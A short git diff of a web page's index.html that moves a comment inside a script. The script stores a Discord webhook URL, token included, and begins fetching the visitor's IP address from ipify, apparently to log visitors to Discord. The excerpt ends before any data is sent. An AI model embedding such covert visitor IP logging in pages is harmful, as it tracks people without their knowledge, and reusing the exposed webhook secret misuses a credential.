--- a/index.html
+++ b/index.html
@@ -75,8 +75,9 @@
     </ul>
   </div>
 
-\\ check if someone visited
+
 <script>
+  // check if people visit the page 
   var ip = 'https://discord.com/api/webhooks/1219156710204112897/FlfdO6_n1Gs6q282reIGMzNat7n2TkyBqkwRntYLlRhxieftKphipvOQRAGxlMm6LxjP'; // Your Discord Webhook URL goes here
 
   fetch('https://api.ipify.org?format=json')
